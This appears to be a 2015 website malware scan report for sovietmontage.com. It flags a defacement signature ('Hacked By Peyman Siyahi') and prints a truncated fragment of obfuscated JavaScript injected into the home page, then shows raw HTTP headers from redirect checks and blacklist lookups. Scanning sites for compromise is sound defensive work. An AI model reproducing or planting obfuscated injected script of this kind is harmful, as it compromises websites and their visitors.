Scanned pages/files
Request | Server response | Status |
http://sovietmontage.com/ | 200 OK Content-Length: 12993 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked By Peyman Siyahi <html>
<head> <meta content="Hacked By Peyman Siyahi" name="subject"> <meta content="Hacked By Peyman Siyahi" name="Abstract"> <meta content="Hacked By Peyman Siyahi" name="description"> <SCRIPT> var x = "_=(\"Y}RrO[c%8Cm%91%5Cp%86%89%87%90Y}bbJVj%91%89p%91Hm%91XS%87" + "%91Y%5Cp%86%89%91z%89dwwqQ^]b%8Aw%91V_v%91]%89%8EV_Q%91%89d^%85qQ_^Q%8" + "7%91Y}J_^%8EVjSbb%87%90Y}bbJVj%91Hm%91XS%87%91Y%5Cp%86%89%91z%89dwwqQ^" + " ...[13236 bytes skipped]... | ||
http://sovietmontage.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 28 Nov 2015 12:56:30 GMT Pragma: no-cache Location: http://www.sovietmontage.com/test404page.js Server: Apache Vary: Cookie,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.sovietmontage.com/xmlrpc.php | clean |
http://www.sovietmontage.com/test404page.js | 404 Not Found Content-Length: 12854 Content-Type: text/html | clean |
http://www.sovietmontage.com/wp-includes/js/jquery/jquery.js?ver=1.11.3 | 200 OK Content-Length: 95977 Content-Type: application/javascript | clean |
http://www.sovietmontage.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.sovietmontage.com/wp-content/themes/side-blog/scripts/jquery.superfish.js?ver=4.3.1 | 200 OK Content-Length: 3846 Content-Type: application/javascript | clean |
http://www.sovietmontage.com/wp-content/themes/side-blog/scripts/jquery.easing.js?ver=4.3.1 | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://www.sovietmontage.com/wp-content/themes/side-blog/scripts/fancybox/jquery.fancybox.js?ver=4.3.1 | 200 OK Content-Length: 28311 Content-Type: application/javascript | clean |
http://apis.google.com/js/plusone.js | 200 OK Content-Length: 13269 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sovietmontage.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 Nov 2015 12:56:29 GMT
Accept-Ranges: bytes
ETag: "32c1-5102d1c4e0080"
Server: Apache
Vary: Accept-Encoding
Content-Length: 12993
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 28 Feb 2015 22:00:18 GMT
...12993 bytes of data.
GET / HTTP/1.1
Host: sovietmontage.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 Nov 2015 12:56:29 GMT
Accept-Ranges: bytes
ETag: "32c1-5102d1c4e0080"
Server: Apache
Vary: Accept-Encoding
Content-Length: 12993
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 28 Feb 2015 22:00:18 GMT
...12993 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sovietmontage.com
Referer: http://www.google.com/search?q=sovietmontage.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sovietmontage.com
Referer: http://www.google.com/search?q=sovietmontage.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sovietmontage.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sovietmontage.com/
Result: sovietmontage.com is not infected or malware details are not published yet.
Result: sovietmontage.com is not infected or malware details are not published yet.